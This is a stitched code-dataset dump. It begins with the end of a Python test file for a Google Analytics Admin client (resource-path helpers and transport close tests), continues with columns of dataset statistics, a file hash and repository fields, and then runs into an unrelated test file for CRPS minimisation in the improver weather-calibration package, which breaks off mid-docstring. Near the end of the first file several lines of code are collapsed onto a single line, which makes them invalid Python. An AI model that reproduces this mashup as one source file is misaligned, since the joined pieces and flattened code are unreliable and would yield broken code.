    expected = "properties/{property}/webDataStreams/{web_data_stream}/measurementProtocolSecrets/{measurement_protocol_secret}".format(
        property=property,
        web_data_stream=web_data_stream,
        measurement_protocol_secret=measurement_protocol_secret,
    )
    actual = AnalyticsAdminServiceClient.measurement_protocol_secret_path(
        property, web_data_stream, measurement_protocol_secret
    )
    assert expected == actual


def test_parse_measurement_protocol_secret_path():
    """parse_measurement_protocol_secret_path must invert the path helper."""
    expected = {
        "property": "octopus",
        "web_data_stream": "oyster",
        "measurement_protocol_secret": "nudibranch",
    }
    path = AnalyticsAdminServiceClient.measurement_protocol_secret_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_measurement_protocol_secret_path(path)
    assert expected == actual


def test_property_path():
    """property_path must compose the expected resource string."""
    property = "cuttlefish"
    expected = "properties/{property}".format(property=property,)
    actual = AnalyticsAdminServiceClient.property_path(property)
    assert expected == actual


def test_parse_property_path():
    """parse_property_path must invert property_path."""
    expected = {
        "property": "mussel",
    }
    path = AnalyticsAdminServiceClient.property_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_property_path(path)
    assert expected == actual


def test_user_link_path():
    """user_link_path must compose the expected resource string."""
    account = "winkle"
    user_link = "nautilus"
    expected = "accounts/{account}/userLinks/{user_link}".format(
        account=account, user_link=user_link,
    )
    actual = AnalyticsAdminServiceClient.user_link_path(account, user_link)
    assert expected == actual


def test_parse_user_link_path():
    """parse_user_link_path must invert user_link_path."""
    expected = {
        "account": "scallop",
        "user_link": "abalone",
    }
    path = AnalyticsAdminServiceClient.user_link_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_user_link_path(path)
    assert expected == actual


def test_web_data_stream_path():
    """web_data_stream_path must compose the expected resource string."""
    property = "squid"
    web_data_stream = "clam"
    expected = "properties/{property}/webDataStreams/{web_data_stream}".format(
        property=property, web_data_stream=web_data_stream,
    )
    actual = AnalyticsAdminServiceClient.web_data_stream_path(property, web_data_stream)
    assert expected == actual


def test_parse_web_data_stream_path():
    """parse_web_data_stream_path must invert web_data_stream_path."""
    expected = {
        "property": "whelk",
        "web_data_stream": "octopus",
    }
    path = AnalyticsAdminServiceClient.web_data_stream_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_web_data_stream_path(path)
    assert expected == actual


def test_common_billing_account_path():
    """common_billing_account_path must compose the expected resource string."""
    billing_account = "oyster"
    expected = "billingAccounts/{billing_account}".format(
        billing_account=billing_account,
    )
    actual = AnalyticsAdminServiceClient.common_billing_account_path(billing_account)
    assert expected == actual


def test_parse_common_billing_account_path():
    """parse_common_billing_account_path must invert common_billing_account_path."""
    expected = {
        "billing_account": "nudibranch",
    }
    path = AnalyticsAdminServiceClient.common_billing_account_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_common_billing_account_path(path)
    assert expected == actual


def test_common_folder_path():
    """common_folder_path must compose the expected resource string."""
    folder = "cuttlefish"
    expected = "folders/{folder}".format(folder=folder,)
    actual = AnalyticsAdminServiceClient.common_folder_path(folder)
    assert expected == actual


def test_parse_common_folder_path():
    """parse_common_folder_path must invert common_folder_path."""
    expected = {
        "folder": "mussel",
    }
    path = AnalyticsAdminServiceClient.common_folder_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_common_folder_path(path)
    assert expected == actual


def test_common_organization_path():
    """common_organization_path must compose the expected resource string."""
    organization = "winkle"
    expected = "organizations/{organization}".format(organization=organization,)
    actual = AnalyticsAdminServiceClient.common_organization_path(organization)
    assert expected == actual


def test_parse_common_organization_path():
    """parse_common_organization_path must invert common_organization_path."""
    expected = {
        "organization": "nautilus",
    }
    path = AnalyticsAdminServiceClient.common_organization_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_common_organization_path(path)
    assert expected == actual


def test_common_project_path():
    """common_project_path must compose the expected resource string."""
    project = "scallop"
    expected = "projects/{project}".format(project=project,)
    actual = AnalyticsAdminServiceClient.common_project_path(project)
    assert expected == actual


def test_parse_common_project_path():
    """parse_common_project_path must invert common_project_path."""
    expected = {
        "project": "abalone",
    }
    path = AnalyticsAdminServiceClient.common_project_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_common_project_path(path)
    assert expected == actual


def test_common_location_path():
    """common_location_path must compose the expected resource string."""
    project = "squid"
    location = "clam"
    expected = "projects/{project}/locations/{location}".format(
        project=project, location=location,
    )
    actual = AnalyticsAdminServiceClient.common_location_path(project, location)
    assert expected == actual


def test_parse_common_location_path():
    expected = {
        "project": "whelk",
        "location": "octopus",
    }
    path = AnalyticsAdminServiceClient.common_location_path(**expected)

    # Check that the path construction is reversible.
actual = AnalyticsAdminServiceClient.parse_common_location_path(path) assert expected == actual def test_client_withDEFAULT_CLIENT_INFO(): client_info = gapic_v1.client_info.ClientInfo() with mock.patch.object( transports.AnalyticsAdminServiceTransport, "_prep_wrapped_messages" ) as prep: client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), client_info=client_info, ) prep.assert_called_once_with(client_info) with mock.patch.object( transports.AnalyticsAdminServiceTransport, "_prep_wrapped_messages" ) as prep: transport_class = AnalyticsAdminServiceClient.get_transport_class() transport = transport_class( credentials=ga_credentials.AnonymousCredentials(), client_info=client_info, ) prep.assert_called_once_with(client_info) @pytest.mark.asyncio async def test_transport_close_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc_asyncio", ) with mock.patch.object( type(getattr(client.transport, "grpc_channel")), "close" ) as close: async with client: close.assert_not_called() close.assert_called_once() def test_transport_close(): transports = { "grpc": "_grpc_channel", } for transport, close_name in transports.items(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport ) with mock.patch.object( type(getattr(client.transport, close_name)), "close" ) as close: with client: close.assert_not_called() close.assert_called_once() def test_client_ctx(): transports = [ "grpc", ] for transport in transports: client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport ) # Test client calls underlying transport. with mock.patch.object(type(client.transport), "close") as close: close.assert_not_called() with client: pass close.assert_called()
38.535037
138
0.695331
97,727
863,917
5.894297
0.007153
0.027537
0.025322
0.057136
0.979845
0.971191
0.953668
0.942198
0.931558
0.918018
0
0.006381
0.22778
863,917
22,418
139
38.536756
0.857062
0.211055
0
0.735439
0
0
0.064287
0.021008
0
0
0
0.000045
0.140027
1
0.038032
false
0.000066
0.001862
0.000133
0.040027
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
c77b100b06f2addd18ef1457afdfd889ec7c4c33
35,791
py
Python
improver_tests/calibration/ensemble_calibration/test_ContinuousRankedProbabilityScoreMinimisers.py
yzhaobom/improver
47f9e103c63f890bfbb24d5e08d9d01d041514f7
[ "BSD-3-Clause" ]
null
null
null
improver_tests/calibration/ensemble_calibration/test_ContinuousRankedProbabilityScoreMinimisers.py
yzhaobom/improver
47f9e103c63f890bfbb24d5e08d9d01d041514f7
[ "BSD-3-Clause" ]
4
2017-05-24T10:30:02.000Z
2021-09-30T08:58:50.000Z
improver_tests/calibration/ensemble_calibration/test_ContinuousRankedProbabilityScoreMinimisers.py
btrotta-bom/improver
dbe08f379072b5d5074ce4ad661c37a9f40437c0
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # (C) British Crown Copyright 2017-2021 Met Office. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """ Unit tests for the `ensemble_calibration.ContinuousRankedProbabilityScoreMinimisers` class. 
""" import unittest import iris import numpy as np from iris.tests import IrisTest from improver.calibration.ensemble_calibration import ( ContinuousRankedProbabilityScoreMinimisers as Plugin, ) from improver.calibration.utilities import convert_cube_data_to_2d from improver.utilities.warnings_handler import ManageWarnings from .helper_functions import EnsembleCalibrationAssertions, SetupCubes class SetupInputs(IrisTest): """Set up inputs for testing.""" def setUp(self): """Set up inputs for testing.""" super().setUp() self.sqrt_pi = np.sqrt(np.pi).astype(np.float64) self.initial_guess_for_mean = np.array([0, 1, 0, 1], dtype=np.float64) self.initial_guess_for_realization = np.array( [0, np.sqrt(1 / 3.0), np.sqrt(1 / 3.0), np.sqrt(1 / 3.0), 0, 1], dtype=np.float64, ) class SetupNormalInputs(SetupInputs, SetupCubes): """Create a class for setting up cubes for testing.""" @ManageWarnings( ignored_messages=["Collapsing a non-contiguous coordinate."], warning_types=[UserWarning], ) def setUp(self): """Set up expected inputs.""" super().setUp() # Set up cubes and associated data arrays for temperature. 
self.forecast_predictor_mean = self.historic_temperature_forecast_cube.collapsed( "realization", iris.analysis.MEAN ) self.forecast_predictor_realizations = ( self.historic_temperature_forecast_cube.copy() ) self.forecast_variance = self.historic_temperature_forecast_cube.collapsed( "realization", iris.analysis.VARIANCE ) self.truth = self.historic_temperature_forecast_cube.collapsed( "realization", iris.analysis.MAX ) self.forecast_predictor_data = self.forecast_predictor_mean.data.flatten().astype( np.float64 ) self.forecast_predictor_data_realizations = convert_cube_data_to_2d( self.historic_temperature_forecast_cube.copy() ).astype(np.float64) self.forecast_variance_data = self.forecast_variance.data.flatten().astype( np.float64 ) self.truth_data = self.truth.data.flatten().astype(np.float64) class Test_calculate_normal_crps(SetupNormalInputs): """ Test minimising the CRPS for a normal distribution. Either the ensemble mean or the individual ensemble realizations are used as the predictors. """ def setUp(self): """Set up plugin.""" super().setUp() self.precision = 4 self.plugin = Plugin(tolerance=1e-4) @ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."]) def test_basic_mean_predictor(self): """ Test that the plugin returns a numpy float value with the mean as the predictor. The result indicates the minimum value for the CRPS that was achieved by the minimisation. """ predictor = "mean" result = self.plugin.calculate_normal_crps( self.initial_guess_for_mean, self.forecast_predictor_data, self.truth_data, self.forecast_variance_data, self.sqrt_pi, predictor, ) self.assertIsInstance(result, np.float64) self.assertAlmostEqual(result, 0.3006, places=self.precision) @ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."]) def test_basic_realizations_predictor(self): """ Test that the plugin returns a numpy float value with the ensemble realizations as the predictor. 
The result indicates the minimum value for the CRPS that was achieved by the minimisation. """ predictor = "realizations" result = self.plugin.calculate_normal_crps( self.initial_guess_for_realization, self.forecast_predictor_data_realizations, self.truth_data, self.forecast_variance_data, self.sqrt_pi, predictor, ) self.assertIsInstance(result, np.float64) self.assertAlmostEqual(result, 0.3006, places=self.precision) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "invalid value encountered in", ], warning_types=[UserWarning, RuntimeWarning], ) def test_basic_mean_predictor_bad_value(self): """ Test that the plugin returns a numpy float64 value and that the value matches the BAD_VALUE, when the appropriate condition is found. The ensemble mean is the predictor. The initial guess is specifically set to float32 precision for the purpose for generating the BAD_VALUE for the unit test. """ initial_guess = np.array([1e65, 1e65, 1e65, 1e65], dtype=np.float32) predictor = "mean" result = self.plugin.calculate_normal_crps( initial_guess, self.forecast_predictor_data, self.truth_data, self.forecast_variance_data, self.sqrt_pi, predictor, ) self.assertIsInstance(result, np.float64) self.assertAlmostEqual(result, self.plugin.BAD_VALUE, self.precision) class Test_process_normal_distribution( SetupNormalInputs, EnsembleCalibrationAssertions ): """ Test minimising the CRPS for a normal distribution. Either the ensemble mean or the individual ensemble realizations are used as the predictors. """ def setUp(self): """Set up expected output. The coefficients are in the order [alpha, beta, gamma, delta]. 
""" super().setUp() self.tolerance = 1e-4 self.plugin = Plugin(tolerance=self.tolerance) self.expected_mean_coefficients = [-0.0003, 1.0013, 0.0012, 0.5945] self.expected_realizations_coefficients = [ 0.0254, 0.4349, 0.39, 0.8122, -0.0016, 0.2724, ] self.expected_mean_coefficients_point_by_point = np.array( [ [ [0.0015, 0.0037, -0.002], [-0.0009, 0.0008, 0.0015], [-0.0046, 0.0053, -0.0038], ], [ [1.0039, 1.0035, 1.0009], [1.0013, 1.0011, 1.001], [1.002, 1.0015, 1.0008], ], [ [0.0017, -0.0009, -0.0002], [0.0054, 0.0003, -0.0002], [-0.0001, -0.0018, 0.0002], ], [ [-0.0, 0.0007, -0.0009], [0.0003, -0.0001, -0.001], [-0.0013, 0.0, 0.0006], ], ], dtype=np.float32, ) self.expected_mean_coefficients_point_by_point_sites = np.array( [ [0.0017, 0.0017, 0.0017, 0.0017], [1.0036, 1.0036, 1.0036, 1.0036], [0.0017, 0.0017, 0.0017, 0.0017], [-0.0, -0.0, -0.0, 0.0], ], dtype=np.float32, ) self.expected_realizations_coefficients_point_by_point = np.array( [ [ [0.0001, 0.0001, 0.0001], [0.0001, 0.0001, 0.0], [0.0001, 0.0001, 0.0001], ], [ [0.579, 0.5793, 0.5782], [0.5782, 0.5778, 0.5781], [0.5786, 0.5782, 0.5783], ], [ [0.5795, 0.5786, 0.5782], [0.5783, 0.578, 0.5767], [0.5791, 0.578, 0.5763], ], [ [0.5773, 0.5769, 0.5763], [0.5769, 0.5771, 0.5782], [0.5764, 0.5773, 0.5783], ], [ [0.0001, 0.0001, 0.0001], [0.0001, 0.0001, 0.0001], [0.0001, 0.0001, 0.0], ], [ [1.0194, 1.0143, 1.0199], [1.0199, 1.02, 1.013], [1.0144, 0.9885, 1.0246], ], ], dtype=np.float32, ) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning], ) def test_basic_mean_predictor(self): """ Test that the plugin returns a numpy array with the expected coefficients. The ensemble mean is the predictor. 
""" predictor = "mean" distribution = "norm" result = self.plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) self.assertIsInstance(result, np.ndarray) self.assertEqual(result.dtype, np.float32) self.assertEMOSCoefficientsAlmostEqual(result, self.expected_mean_coefficients) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", "invalid value encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning, RuntimeWarning], ) def test_basic_realizations_predictor(self): """ Test that the plugin returns a numpy array with the expected coefficients. The ensemble realizations are the predictor. """ predictor = "realizations" distribution = "norm" result = self.plugin.process( self.initial_guess_for_realization, self.forecast_predictor_realizations, self.truth, self.forecast_variance, predictor, distribution, ) self.assertIsInstance(result, np.ndarray) self.assertEqual(result.dtype, np.float32) self.assertEMOSCoefficientsAlmostEqual( result, self.expected_realizations_coefficients ) @ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."]) def test_mean_predictor_keyerror(self): """ Test that the minimisation has resulted in a KeyError, if the distribution that has been requested was not within the dictionary containing the minimisation functions. 
""" predictor = "mean" distribution = "foo" msg = "Distribution requested" with self.assertRaisesRegex(KeyError, msg): self.plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning], ) def test_mean_predictor_max_iterations(self): """ Test that the plugin returns a list of coefficients equal to specific values, when the ensemble mean is the predictor assuming a normal distribution and the value specified for the max_iterations is overridden. The coefficients are calculated by minimising the CRPS. """ predictor = "mean" max_iterations = 400 distribution = "norm" plugin = Plugin(tolerance=self.tolerance, max_iterations=max_iterations) result = plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) self.assertEMOSCoefficientsAlmostEqual(result, self.expected_mean_coefficients) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", "invalid value encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning, RuntimeWarning], ) def test_realizations_predictor_max_iterations(self): """ Test that the plugin returns a list of coefficients equal to specific values, when the ensemble realizations are the predictor assuming a truncated normal distribution and the value specified for the MAX_ITERATIONS is overridden. The coefficients are calculated by minimising the CRPS. 
""" predictor = "realizations" max_iterations = 1000 distribution = "norm" plugin = Plugin(tolerance=self.tolerance, max_iterations=max_iterations) result = plugin.process( self.initial_guess_for_realization, self.forecast_predictor_realizations, self.truth, self.forecast_variance, predictor, distribution, ) self.assertEMOSCoefficientsAlmostEqual( result, self.expected_realizations_coefficients ) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning], ) def test_mean_predictor_point_by_point(self): """ Test that the expected coefficients are generated when the ensemble mean is the predictor for a normal distribution and coefficients are calculated independently at each grid point. The coefficients are calculated by minimising the CRPS. """ predictor = "mean" distribution = "norm" initial_guess = np.broadcast_to( self.initial_guess_for_mean, ( len(self.truth.coord(axis="y").points) * len(self.truth.coord(axis="x").points), len(self.initial_guess_for_mean), ), ) plugin = Plugin(tolerance=self.tolerance, point_by_point=True) result = plugin.process( initial_guess, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) self.assertEMOSCoefficientsAlmostEqual( result, self.expected_mean_coefficients_point_by_point ) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning], ) def test_mean_predictor_point_by_point_sites(self): """ Test that the expected coefficients are generated when the ensemble mean is the predictor for a normal distribution and coefficients are calculated independently at each site location. The coefficients are calculated by minimising the CRPS. 
""" forecast_spot_cube = self.historic_forecast_spot_cube.collapsed( "realization", iris.analysis.MEAN ) forecast_var_spot_cube = forecast_spot_cube.copy() forecast_var_spot_cube.data = forecast_var_spot_cube.data / 10.0 predictor = "mean" distribution = "norm" initial_guess = np.broadcast_to( self.initial_guess_for_mean, ( len(self.truth.coord(axis="y").points) * len(self.truth.coord(axis="x").points), len(self.initial_guess_for_mean), ), ) plugin = Plugin(tolerance=self.tolerance, point_by_point=True) result = plugin.process( initial_guess, forecast_spot_cube, self.truth_spot_cube, forecast_var_spot_cube, predictor, distribution, ) self.assertEMOSCoefficientsAlmostEqual( result, self.expected_mean_coefficients_point_by_point_sites ) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", "invalid value encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning, RuntimeWarning], ) def test_realizations_predictor_point_by_point(self): """ Test that the expected coefficients are generated when the ensemble realizations are the predictor for a normal distribution and coefficients are calculated independently at each grid point. The coefficients are calculated by minimising the CRPS. """ predictor = "realizations" distribution = "norm" initial_guess = np.broadcast_to( self.initial_guess_for_realization, ( len(self.truth.coord(axis="y").points) * len(self.truth.coord(axis="x").points), len(self.initial_guess_for_realization), ), ) # Use a larger value for the tolerance to terminate sooner to avoid # minimising in computational noise. 
plugin = Plugin(tolerance=0.01, point_by_point=True) result = plugin.process( initial_guess, self.forecast_predictor_realizations, self.truth, self.forecast_variance, predictor, distribution, ) self.assertArrayAlmostEqual( result, self.expected_realizations_coefficients_point_by_point, decimal=2 ) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning], ) @ManageWarnings( record=True, ignored_messages=["Collapsing a non-contiguous coordinate."] ) def test_catch_warnings(self, warning_list=None): """ Test that a warning is generated if the minimisation does not result in a convergence. The ensemble mean is the predictor. """ predictor = "mean" distribution = "norm" plugin = Plugin(tolerance=self.tolerance, max_iterations=10) plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) warning_msg = "Minimisation did not result in convergence after" self.assertTrue(any(item.category == UserWarning for item in warning_list)) self.assertTrue(any(warning_msg in str(item) for item in warning_list)) @ManageWarnings( record=True, ignored_messages=["Collapsing a non-contiguous coordinate."] ) def test_catch_warnings_percentage_change(self, warning_list=None): """ Test that two warnings are generated if the minimisation does not result in a convergence. The first warning reports a that the minimisation did not result in convergence, whilst the second warning reports that the percentage change in the final iteration was greater than the tolerated value. The ensemble mean is the predictor. 
""" initial_guess = np.array([5000, 1, 0, 1], dtype=np.float64) predictor = "mean" distribution = "norm" plugin = Plugin(tolerance=self.tolerance, max_iterations=5) plugin.process( initial_guess, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) warning_msg_min = "Minimisation did not result in convergence after" warning_msg_iter = "The final iteration resulted in a percentage " self.assertTrue(any(item.category == UserWarning for item in warning_list)) self.assertTrue(any(warning_msg_min in str(item) for item in warning_list)) self.assertTrue(any(warning_msg_iter in str(item) for item in warning_list)) class SetupTruncatedNormalInputs(SetupInputs, SetupCubes): """Create a class for setting up cubes for testing.""" @ManageWarnings( ignored_messages=["Collapsing a non-contiguous coordinate."], warning_types=[UserWarning], ) def setUp(self): """Set up expected inputs.""" super().setUp() # Set up cubes and associated data arrays for wind speed. self.forecast_predictor_mean = self.historic_wind_speed_forecast_cube.collapsed( "realization", iris.analysis.MEAN ) self.forecast_predictor_realizations = ( self.historic_wind_speed_forecast_cube.copy() ) self.forecast_variance = self.historic_wind_speed_forecast_cube.collapsed( "realization", iris.analysis.VARIANCE ) self.truth = self.historic_wind_speed_forecast_cube.collapsed( "realization", iris.analysis.MAX ) self.forecast_predictor_data = self.forecast_predictor_mean.data.flatten().astype( np.float64 ) self.forecast_predictor_data_realizations = convert_cube_data_to_2d( self.historic_wind_speed_forecast_cube.copy() ).astype(np.float64) self.forecast_variance_data = self.forecast_variance.data.flatten().astype( np.float64 ) self.truth_data = self.truth.data.flatten().astype(np.float64) class Test_calculate_truncated_normal_crps(SetupTruncatedNormalInputs): """ Test minimising the crps for a truncated normal distribution. 
Either the ensemble mean or the individual ensemble realizations are used as the predictors. """ def setUp(self): """Set up plugin.""" super().setUp() self.precision = 4 self.plugin = Plugin(tolerance=1e-4) @ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."]) def test_basic_mean_predictor(self): """ Test that the plugin returns a numpy float value. The ensemble mean is the predictor. The result indicates the minimum value for the CRPS that was achieved by the minimisation. """ predictor = "mean" result = self.plugin.calculate_truncated_normal_crps( self.initial_guess_for_mean, self.forecast_predictor_data, self.truth_data, self.forecast_variance_data, self.sqrt_pi, predictor, ) self.assertIsInstance(result, np.float64) self.assertAlmostEqual(result, 0.2150, self.precision) @ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."]) def test_basic_realizations_predictor(self): """ Test that the plugin returns a numpy float value. The ensemble realizations are the predictor. The result indicates the minimum value for the CRPS that was achieved by the minimisation. """ predictor = "realizations" result = self.plugin.calculate_truncated_normal_crps( self.initial_guess_for_realization, self.forecast_predictor_data_realizations, self.truth_data, self.forecast_variance_data, self.sqrt_pi, predictor, ) self.assertIsInstance(result, np.float64) self.assertAlmostEqual(result, 0.2150, self.precision) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "invalid value encountered in", ], warning_types=[UserWarning, RuntimeWarning], ) def test_basic_mean_predictor_bad_value(self): """ Test that the plugin returns a numpy float64 value and that the value matches the BAD_VALUE, when the appropriate condition is found. The ensemble mean is the predictor. The initial guess is specifically set to float32 precision for the purpose for generating the BAD_VALUE for the unit test. 
""" initial_guess = np.array([1e65, 1e65, 1e65, 1e65], dtype=np.float32) predictor = "mean" result = self.plugin.calculate_truncated_normal_crps( initial_guess, self.forecast_predictor_data, self.truth_data, self.forecast_variance_data, self.sqrt_pi, predictor, ) self.assertIsInstance(result, np.float64) self.assertAlmostEqual(result, self.plugin.BAD_VALUE, self.precision) class Test_process_truncated_normal_distribution( SetupTruncatedNormalInputs, EnsembleCalibrationAssertions ): """ Test minimising the CRPS for a truncated normal distribution. Either the ensemble mean or the individual ensemble realizations are used as the predictors. """ def setUp(self): """Set up expected output.""" super().setUp() self.tolerance = 1e-4 self.plugin = Plugin(tolerance=self.tolerance) self.expected_mean_coefficients = [0.3958, 0.9854, -0.0, 0.621] self.expected_realizations_coefficients = [ 0.1898, -0.1558, 0.4452, 0.8877, -0.1331, -0.0002, ] @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "The final iteration resulted in", "invalid value encountered in", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning, RuntimeWarning], ) def test_basic_mean_predictor(self): """ Test that the plugin returns a numpy array. The ensemble mean is the predictor. 
""" predictor = "mean" distribution = "truncnorm" result = self.plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) self.assertIsInstance(result, np.ndarray) self.assertEMOSCoefficientsAlmostEqual(result, self.expected_mean_coefficients) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "invalid value encountered in", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning, RuntimeWarning], ) def test_basic_realizations_predictor(self): """ Test that the plugin returns a numpy array with the expected coefficients. The ensemble realizations are the predictor. """ predictor = "realizations" distribution = "truncnorm" result = self.plugin.process( self.initial_guess_for_realization, self.forecast_predictor_realizations, self.truth, self.forecast_variance, predictor, distribution, ) self.assertIsInstance(result, np.ndarray) self.assertEMOSCoefficientsAlmostEqual( result, self.expected_realizations_coefficients ) @ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."]) def test_mean_predictor_keyerror(self): """ Test that an exception is raised when the distribution requested is not an available option when the predictor is the ensemble mean. 
""" predictor = "mean" distribution = "foo" msg = "Distribution requested" with self.assertRaisesRegex(KeyError, msg): self.plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "The final iteration resulted in", "invalid value encountered in", "divide by zero encountered in", ], warning_types=[ UserWarning, UserWarning, UserWarning, RuntimeWarning, RuntimeWarning, ], ) def test_mean_predictor_max_iterations(self): """ Test that the plugin returns a list of coefficients equal to specific values, when the ensemble mean is the predictor assuming a truncated normal distribution and the value specified for the max_iterations is overridden. The coefficients are calculated by minimising the CRPS. """ predictor = "mean" max_iterations = 400 distribution = "truncnorm" plugin = Plugin(tolerance=self.tolerance, max_iterations=max_iterations) result = plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) self.assertEMOSCoefficientsAlmostEqual(result, self.expected_mean_coefficients) @ManageWarnings( ignored_messages=[ "Collapsing a non-contiguous coordinate.", "Minimisation did not result in convergence", "invalid value encountered in", "divide by zero encountered in", ], warning_types=[UserWarning, UserWarning, RuntimeWarning, RuntimeWarning], ) def test_realizations_predictor_max_iterations(self): """ Test that the plugin returns a list of coefficients equal to specific values, when the ensemble realizations are the predictor assuming a truncated normal distribution and the value specified for the max_iterations is overridden. The coefficients are calculated by minimising the CRPS. 
""" predictor = "realizations" max_iterations = 1000 distribution = "truncnorm" plugin = Plugin(tolerance=self.tolerance, max_iterations=max_iterations) result = plugin.process( self.initial_guess_for_realization, self.forecast_predictor_realizations, self.truth, self.forecast_variance, predictor, distribution, ) self.assertEMOSCoefficientsAlmostEqual( result, self.expected_realizations_coefficients ) @ManageWarnings( record=True, ignored_messages=["Collapsing a non-contiguous coordinate."] ) def test_catch_warnings(self, warning_list=None): """ Test that a warning is generated if the minimisation does not result in a convergence. The ensemble mean is the predictor. """ predictor = "mean" distribution = "truncnorm" plugin = Plugin(tolerance=self.tolerance, max_iterations=10) plugin.process( self.initial_guess_for_mean, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) warning_msg = "Minimisation did not result in convergence after" self.assertTrue(any(item.category == UserWarning for item in warning_list)) self.assertTrue(any(warning_msg in str(item) for item in warning_list)) @ManageWarnings( record=True, ignored_messages=["Collapsing a non-contiguous coordinate."] ) def test_catch_warnings_percentage_change(self, warning_list=None): """ Test that two warnings are generated if the minimisation does not result in a convergence. The first warning reports a that the minimisation did not result in convergence, whilst the second warning reports that the percentage change in the final iteration was greater than the tolerated value. The 